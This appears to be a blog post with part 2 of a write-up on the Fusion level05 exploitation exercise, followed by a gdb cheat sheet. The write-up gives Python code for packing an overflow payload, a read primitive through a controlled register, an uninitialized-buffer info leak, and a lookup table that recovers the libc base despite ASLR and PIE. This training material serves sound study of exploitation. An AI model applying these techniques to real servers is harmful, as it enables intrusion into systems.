Fusion 5 Part 2

A short recap

We are working on a server with ASLR and PIE. The server does not fork for every new connection, so our solution must be reliable and cannot crash the server. Last time we wrote a client for this server and found 2 buffer overflows, one of which was actually usable. We control the values of ebp, esi, edi and eip, and of course we control the stack.

Our Plan:

  1. Find a buffer overflow
  2. Find a memory read primitive
  3. Find a memory write primitive
  4. Find libc
  5. Find a stack/heap buffer we control

Let's look at that buffer overflow again. I want to see what we are overwriting with our overflow, so I place a breakpoint on get_and_hash and print the registers it saves on the stack (the ones we overwrite).

Breakpoint 2, get_and_hash (maxsz=0, string=0xb7805380 "\203\354\034\213D$ \213\220\224\003", 
 separator=-1217833557) at level05/level05.c:115
115 level05/level05.c: No such file or directory.
 in level05/level05.c
1: x/5i $eip
=> 0xb7803720 <get_and_hash>: push ebp
 0xb7803721 <get_and_hash+1>: xor eax,eax
 0xb7803723 <get_and_hash+3>: push edi
 0xb7803724 <get_and_hash+4>: push esi
 0xb7803725 <get_and_hash+5>: sub esp,0x2c
(gdb) x/s $ebp
0xb78037c0 <checkname>: "\203\354\034\211t$\024\213t$ \211\\$\020\350\223\364\377\377\201\303H9"
(gdb) x/s $esi
0xb8a0c850: "\004"
(gdb) x/s $edi
0xb8a0c860: 'a' <repeats 50 times>

Hmm, $edi points to our buffer (the name we use for checkname). Let's look at the function checkname, which calls get_and_hash.

Can you explain what $edi is used for?

$edi contains the address of our buffer, as we have seen, and it is passed on the stack as a parameter to get_and_hash. It is also used as the argument for the %s in the call to fdprintf. The compiler assumes that get_and_hash does not change $edi: whatever value $edi holds when get_and_hash starts will still be there when it returns. It can assume this because of something called a “calling convention”. Basically, it is a convention about which registers a called function may change, which registers it must preserve, and where the function arguments and return value are passed.

Because $edi is a callee-saved register, the callee (get_and_hash) has to save it on the stack and pop it back before returning to the caller. Because it was on the stack, we could change its value.

The fact that we control the value of $edi means that we can read any address we want in the memory space, as long as we know that the address is mapped and that the program will not crash on reading it 🙂 I will call this a memory read primitive 🙂
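
To make the stack layout concrete, here is a minimal sketch of how such an overflow payload could be packed. The prologue shown above pushes ebp, then edi, then esi, so moving up from the local buffer the saved values sit in the order esi, edi, ebp, return address. The padding length `PAD_LEN` and the helper name `build_overflow` are placeholders of mine and are not taken from the binary.

```python
import struct

# Hypothetical distance from the start of the overflowed buffer to the
# saved esi slot. The real value has to be measured in gdb.
PAD_LEN = 32

def build_overflow(esi, edi, ebp, eip, pad_len=PAD_LEN):
    """Pack padding followed by the saved registers, lowest address first."""
    padding = b"A" * pad_len
    # "<I" is a little-endian unsigned 32-bit value, as used on x86.
    saved = struct.pack("<IIII", esi, edi, ebp, eip)
    return padding + saved

# edi is the interesting slot: it becomes the pointer printed with %s.
payload = build_overflow(esi=0x11111111, edi=0xb8a0c860,
                         ebp=0x22222222, eip=0x33333333)
```

Whatever address ends up in the edi slot is the one the server will try to print as a string, which is what makes this a read primitive.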

What’s next?

It is important to know that right now this read primitive is useless, as long as we don’t know what we would like to read. If we try to read an unmapped address, the server will crash.

I gave it long, hard thought for a few days and figured out that as long as ASLR and PIE are active, I can’t do much. I thought about a partial overwrite of the return address (changing only its lowest byte). It is possible, and it would let me return to any address within the same 256-byte range as the original return address of this function, but I couldn’t find any useful address in that range. I could overwrite the 2 lower bytes of the return address, which would give me 256^2 = 65536 possible return addresses to search. But ASLR and PIE both work at the resolution of a memory page. (On this platform a memory page is 0x1000 bytes; on newer iPhones, for example, it is 0x4000 bytes.) So only the low 12 bits (1.5 bytes) of an address are predictable. I can’t overwrite 1.5 bytes, and when I overwrite 2 bytes I have to guess 4 randomized bits, so I might hit an unmapped address and cause a crash.
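
The arithmetic behind that dead end can be sketched in a few lines. This is only an illustration of the reasoning above; the function name `partial_overwrite_odds` is mine, and the only input taken from the text is the 0x1000 page size.

```python
PAGE_SIZE = 0x1000  # page size on this platform, as stated above

def partial_overwrite_odds(num_bytes, page_size=PAGE_SIZE):
    """Return (candidate targets, chance of guessing the randomized bits)."""
    overwritten_bits = 8 * num_bytes
    page_offset_bits = page_size.bit_length() - 1  # 12 for 0x1000
    # Bits above the page offset are randomized by ASLR/PIE and must be guessed.
    guessed_bits = max(0, overwritten_bits - page_offset_bits)
    return 2 ** overwritten_bits, 1.0 / (2 ** guessed_bits)

one_byte = partial_overwrite_odds(1)   # no guessing, but only 256 targets
two_bytes = partial_overwrite_odds(2)  # 65536 targets, 4 bits to guess
```

With one byte there is nothing to guess but also nothing useful in range; with two bytes a wrong guess lands in a different page, and on a server that must not crash even one miss is too many.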

I kept thinking about it for a few more days and couldn’t find any new directions to look at. I tried playing with the client a little bit, and then...

An unexpected breakthrough

After sending this command:

print send_checkname_command(s, "a" * 10)

I get this output:

$ python fusion5.py 
** welcome to level05 **
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa is not indexed already

Something is off here. I can swear that there are more than 10 a’s in the output. I try it with 10 b’s and I get:

bbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaa is not indexed already

It takes me some time and some more playing with the program, but I conclude that one of the buffers the program uses is not zeroed before use. I use my gdb powerz and figure out that inside the function childtask the buffer “char buffer[512]” is not zeroed before use, so we might be able to read whatever garbage is on the stack immediately after the name we input (until we hit a ‘\0’). This is where I start a few long days of trying to figure out what is on this stack and where. If we can make this bug output a useful address, it becomes what is called an info-leak.
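
The effect is easy to reproduce in a small simulation. This is not the server's code, only a sketch of the mechanism, assuming the name is copied into a reused buffer without a terminating zero and later printed as a C string. The helper names `c_string` and `handle_name` are made up for the illustration.

```python
def c_string(buf):
    """Read bytes up to the first NUL, the way printf's %s would."""
    end = buf.find(b"\x00")
    return bytes(buf if end < 0 else buf[:end])

def handle_name(stack_buffer, name):
    """Copy name into the buffer without clearing or terminating it first."""
    stack_buffer[:len(name)] = name
    return c_string(stack_buffer)

# One reused 512-byte region standing in for "char buffer[512]".
stack_buffer = bytearray(512)
stack_buffer[:32] = b"a" * 32  # stale data left over from an earlier use
leaked = handle_name(stack_buffer, b"b" * 10)
```

Here `leaked` holds the 10 b's followed by the 22 stale a's, the same shape as the output above. If the stale bytes were a pointer instead of a's, the reply would contain an address.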

Triggering the info-leak

The first thing I do is connect with a debugger and try to figure out if there is anything useful on the stack when this function is being called.

1: x/2i $eip
=> 0xb77ade4e <childtask+478>: call 0xb77ad7f0 <__strdup@plt>
 0xb77ade53 <childtask+483>: mov DWORD PTR [esi+0x4],eax

(gdb) x/32bx *(int*) $esp
0xb7bb75ca: 0x62 0x62 0x62 0x62 0x62 0x62 0x62 0x62
0xb7bb75d2: 0x62 0x62 0x00 0x00 0x00 0x00 0x00 0x00
0xb7bb75da: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xb7bb75e2: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

We don’t see anything useful after our 10 b’s. (0x62 is ‘b’)

My next thought is that maybe after I use some other features of the server, this stack buffer will be filled, and then I will be able to access some data in it. (Impossible if you think about it: the “char buffer[512]” in childtask cannot be affected by functions that childtask calls.) The only hope is that it can be affected by something that happens before childtask starts.

We need to think of some kind of weird behavior that gets us a different stack (or the same stack after it has been filled with data). I guess the most obvious idea is to keep a few connections open at the same time. Unfortunately, this server will not handle our second request while the first task is waiting for input. This is exactly the difference between tasks and threads: there is no scheduler to simulate both tasks executing at the same time. The second task will not run until the “main” (= childtask) of the first task returns.

I write the following functions:

def try_to_leak_data(length): 
  s = setup_session() 
  s.recv(100) 
 
  data = send_checkname_command(s, "A" * length) 
  data = data[length:] 
  data = data[:-len(" is not indexed already.")] 
 
  return data 
 
def search_for_data_leak(length, retries): 
  leaked_data = None 
  for i in range(retries): 
    data = try_to_leak_data(length) 
    if len(data) >= 4:
      print i, data.encode("hex") 
      leaked_data = data[:4] 
      break 
  return leaked_data 
 
def main(): 
  print hex(buffer_to_address(search_for_data_leak(10,100))) 

I run it a few times. Sometimes it works giving me an output like this:

$ python ./fusion5.py 
15 38747eb723
0xb77e7438

Notice that 15 is the number of iterations needed to get this data (out of a maximum of 100 tries). After it worked once, the second time I run it I get the same output but in iteration number 0. And after I kill the server and restart it, sometimes I can’t leak any info from it.
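
The helper buffer_to_address is used above but not shown in this part. A plausible version, which is my guess and not necessarily the original, simply reads the first 4 leaked bytes as a little-endian 32-bit value. Feeding it the bytes from the run above gives the address that was printed:

```python
import binascii
import struct

def buffer_to_address(data):
    """Interpret the first 4 bytes as a little-endian 32-bit address."""
    return struct.unpack("<I", data[:4])[0]

leaked = binascii.unhexlify("38747eb723")  # bytes printed by the run above
address = buffer_to_address(leaked)
```

The bytes come out of the server in memory order (38 74 7e b7), so they have to be reversed to read as 0xb77e7438.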

Anyway, let’s explore this address that I can sometimes leak from the server:

(gdb) x/1wx 0xb77e7438
0xb77e7438 <main_arena+56>: 0xb93b9598

With “info proc map” in gdb, I confirm that this address is in libc!

After some more restarting of the server and running my script, I find that I get this libc address about 1/3 of the time.

Finding libc

Of course, 1/3 of the time is not good enough. I keep trying different lengths for the buffer I send (essentially searching the stack at different offsets). After some more trial and error I find that if I try lengths 2, 6 and 10, I always get an address.

The thing is, I get different addresses every time I restart the server (which causes ASLR to re-randomize the address space). Remember how I said ASLR only works at the resolution of a memory page? I wasn’t kidding about it 🙂 Anyway, I figured out that every time I get an address that ends with 0x438, I can subtract 0x179438 and get the load address of libc. In the same way I mapped about 10 different in-page offsets of addresses I got while running and restarting the server, and for each of them I recorded its offset from the libc base. It is worth mentioning that some of the time I got an address inside ld. It took me a lot of trials of exploiting the bug with the libc address before I tested it and saw that libc is at a constant offset from ld (at least in the target VM). I ended up with this function:

POSSIBLE_LEAKS_DICT = { 
  0x6ec: 0x96ec + 0x189000, 
  0x13d: 0x913d + 0x189000, 
  0xff4: 0x1eff4 + 0x189000, 
 
  0xbc8: 0x187bc8, 
  0x8d8: 0x1878d8, 
 
  0xf30: 0xcf30, 
  0x430: 0x179430, 
  0x438: 0x179438, 
} 
 
def find_libc(): 
  libc_addr = None 
  for l in [2, 6, 10]: 
    print l 
    data = search_for_data_leak(l, 10) 
    if (data is not None) and data != "AAAA": 
      addr = struct.unpack("I", data)[0] 
      print l, hex(addr) 
      lsb = addr & 0xFFF
      if lsb in POSSIBLE_LEAKS_DICT: 
        libc_addr = addr - POSSIBLE_LEAKS_DICT[lsb] 
  return libc_addr 
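
As a worked example of the subtraction inside find_libc, here is the same lookup as a pure function, applied to the address leaked earlier. The function name `libc_base_from_leak` and the extra page-alignment check are my additions. The check is only a sanity test: a load address that is not page aligned would point to a wrong table entry.

```python
PAGE_MASK = 0xFFF  # low 12 bits: offset inside a 0x1000-byte page

def libc_base_from_leak(addr, known_offsets):
    """Return the libc load address, or None if the leak is not recognized."""
    offset = known_offsets.get(addr & PAGE_MASK)
    if offset is None:
        return None
    base = addr - offset
    # A load address must be page aligned; anything else means a bad entry.
    if base & PAGE_MASK:
        return None
    return base

known = {0x438: 0x179438}  # one entry copied from POSSIBLE_LEAKS_DICT
base = libc_base_from_leak(0xb77e7438, known)
```

For the leak 0xb77e7438 this gives 0xb766e000, which ends in three zero hex digits as a page-aligned base should.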

The find_libc function seems to find libc on every try, and this seems like a good place to stop. So to recap, we found an absolute memory read, and we found libc. Next time we will see how we can exploit these bugs. See you next time 🙂

Ultimate gdb cheat sheet

Hello boys and girls, today I will be sharing with you my cheat sheet for gdb. Hope that you will find it useful 🙂

The first thing you need to know about gdb commands is that for every word you would like to write in the gdb terminal, you can type just the first few letters, as long as it is the only word that starts like that. Use tab a lot for auto-complete and always expand your cheat sheet.

Starting a debug session

load a binary in gdb (the process is not started yet)
gdb ./binary_name
(inside gdb terminal) r/run will start the process.
attach to a running process by PID; get debug symbols from bin_path (optional)
gdb -p <PID> <bin_path> 
run the commands in gdbinit as gdb commands. similar to .bashrc but for gdb.
gdb -x gdbinit

basic commands

s - step (next source line, stepping into function calls)
si - step instruction (next instruction, stepping into calls)
n - next line (steps over function calls)
ni - next instruction (steps over calls)
c - continue running the program

p - print a variable or a register. 
    Use the same formatting as x command

i r - info registers (prints list of registers)
i proc maps - prints a list of loaded binaries and their load addresses
info register eax - print eax

u - until: run until a line greater than the current line is reached.
    good for exiting loops

fin/finish - run until a return from this function.

 Break Points

b * 0x1337 - break at an address.
b * function_name - break at function_name
b file_name:line - break at a certain line in a file.
del <breakpoint number> - deletes that breakpoint
del - deletes all breakpoints
i b - info breakpoint. list of breakpoints

Examining memory (de-referencing pointers)

x - print memory
x/w - print as a word (4 bytes)
x/d - print as decimal integer
x/x - print as hex
x/i - print as instruction 
x/s - print as string
x/c - print as char
x/10s - print 10 strings

for example:
x/10s $eax - will print 10 consecutive strings starting at the address in $eax
x/10wx $eax - will print 10 hex-words starting at the address in $eax

for double dereference we use casting
x/x * (int*) $eax - treats $eax as a pointer to a pointer to int and prints what the inner pointer points to.

Disassemble

x/10i address - disassemble 10 instructions starting from address.
disas - disassemble current function.

 The gdbinit file

After forks, the debugger will stay with the child process and not the parent.

set follow-fork-mode child
Show assembly in Intel flavor (like you would expect after working with IDA)
set disassembly-flavor intel
Show the 5 next opcodes every time the debugger stops.
display/5i $pc

Advanced shit

Connects to a running process by name and runs the commands in ./gdbinit. Usually I have a bash script (connect.sh) with this long line for each research project I am working on.

set -- `ps -ef | grep binary_name | grep -v defunct | head -n 1`;  gdb -x ./gdbinit --pid $2
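
The same lookup can be sketched in Python, which makes it easy to also skip the grep process itself, something the one-liner above leaves to luck. This is a rough equivalent and not a drop-in replacement. The function name `pick_pid` and the sample `ps -ef` text (including the path in it) are made up for the illustration.

```python
def pick_pid(ps_output, binary_name):
    """Return the PID of the first live process whose command mentions binary_name."""
    for line in ps_output.splitlines():
        fields = line.split(None, 7)  # UID PID PPID C STIME TTY TIME CMD
        if len(fields) < 8 or not fields[1].isdigit():
            continue  # header or malformed line
        command = fields[7]
        if binary_name not in command:
            continue
        if "defunct" in command or "grep" in command:
            continue  # zombie, or the grep that is searching for the name
        return int(fields[1])
    return None

# Made-up sample in the usual `ps -ef` column layout.
sample = """UID        PID  PPID  C STIME TTY          TIME CMD
root      1201     1  0 10:00 ?        00:00:00 /opt/fusion/bin/level05
root      1202  1201  0 10:01 ?        00:00:00 [level05] <defunct>
user      1300  1250  0 10:02 pts/0    00:00:00 grep level05
"""
pid = pick_pid(sample, "level05")
```

In real use the text would come from running `ps -ef`, and the resulting PID would be passed to gdb with --pid as in the line above.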

Search for a  value in a memory range

find/<size> start_address, +len, value

Add a watchpoint for an expression (program will stop every time expression changes.)

watch <expression>